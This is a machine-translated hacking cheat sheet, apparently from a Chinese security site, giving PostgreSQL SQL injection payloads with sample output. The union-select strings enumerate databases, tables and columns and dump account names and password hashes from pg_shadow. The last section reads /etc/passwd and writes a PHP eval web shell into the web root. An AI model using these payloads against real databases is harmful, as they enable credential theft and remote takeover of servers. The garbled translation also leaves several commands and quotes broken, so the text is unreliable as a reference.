Postgresql injection syntax Guide

Author: Nana
This article is sorry that there are no instances, no.
For a person who is not good at Google, it is not easy to find a Postgresql injection instance.
Only boring statements and ECHO are used as examples.
In SQL software, whether it is MSSQL, MySQL, Oracle, Access or informix, firebird, db2, their SQL logic and syntax remain unchanged. Even so, we do not recommend injecting it into beginners to refer to this article. Because I will not explain every function or syntax.
Reading this article directly, cainiao is certainly difficult and has no examples. However, it is quite easy for anyone who understands SQL statements.
 
 
 
--------------------------------------------------------------------------------
There are usually several injection syntaxes commonly used in injection:
-- Display version
-- Data explosion from a known table segment Field
-- Column Library
-- Column table segments in the database
-- Fields in the list segment
-- Read configuration information, such as database login account and password
-- Read and write files
Then I will talk about the Postgresql syntax one by one.
 
 
-- Display version www.2cto.com
Select version ();
Union select 1, 2,... n, version ()
// The version () function is the same as that of MySQL.
Example of echo data:
PostgreSQL 8.1.18 on i686-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20080704 (Red Hat 4.1.2-46)
 
-- Data explosion from a known table segment Field
Select aa from bb where cc = dd;
Union select 1, 2,... n, aa from bb where cc = dd
// Almost all SQL syntaxes use these syntaxes to kill data.
No example
 
-- Column Library
Select datname from pg_database;
Union select 1, 2,..., n, datname from pg_database;
Echo example:
Postgres, prc, template1, template0
 
-- Column table segments in the database
Select relname from pg_stat_user_tables limit 1 offset n;
// Similar to information_schema.tables in MySQL, although not appropriate
Union select relname from pg_stat_user_tables limit 1 offset 3;
// Limit 1 offset 0 and MySQL limit 0 and 1.
No example
 
-- Fields in the list segment
Select column_name from information_schema.columns where table_name = 'xxx' limit 1 offset n;
Union select 1, 2,..., n, column_name from information_schema.columns where table_name = 0x3a limit 1 offset 5
// Same as MySQL
 
-- Read configuration information, such as database login account and password
Select usename, passwd from pg_shadow;
Union select 1, 2,... n, usename, passwd from pg_shadow
// The pg_shadow database is similar to the MySQL database in mysql.
The root account is ipvs.
Echo example:
Postgres 9d2e7638fd7c7e433f0074a8f65cfd3a
 
-- Read files
Copy test from '/etc/passwd' with delimiter E' \ T ';
(Note: Most Postgresql statements on the Internet contain double quotation marks. In actual tests, 8. x to 9. x double quotation marks are invalid. Double quotation marks should be used)
Echo example:
Query failed: ERROR: extra data after last expected column CONTEXT: COPY file, line 1: "root: x: 0: 0: root:/bin/bash"
 
-- Write files
Insert into test values ('<? Php eval ($ _ POST ["cmd"];?> ');
Copy test (code) to "/var/www/one. php ";
Echo example:
Query failed: ERROR: cocould not open file "/var/www/html/aaa. php" for writing: Permission denied
Pg_file_read () is not as easy as load_file () in MySQL
For example:
Select pg_file_read ('pg _ hba. conf', 1, pg_file_length ('pg _ hb. conf '));
Echo:
Query failed: ERROR: function pg_file_length ("unknown") does not exist HINT: No function matches the given name and argument types. You may need to add explicit type casts.
 
I am not familiar with Postgresql either, so I wrote it here.
// Blackbap.org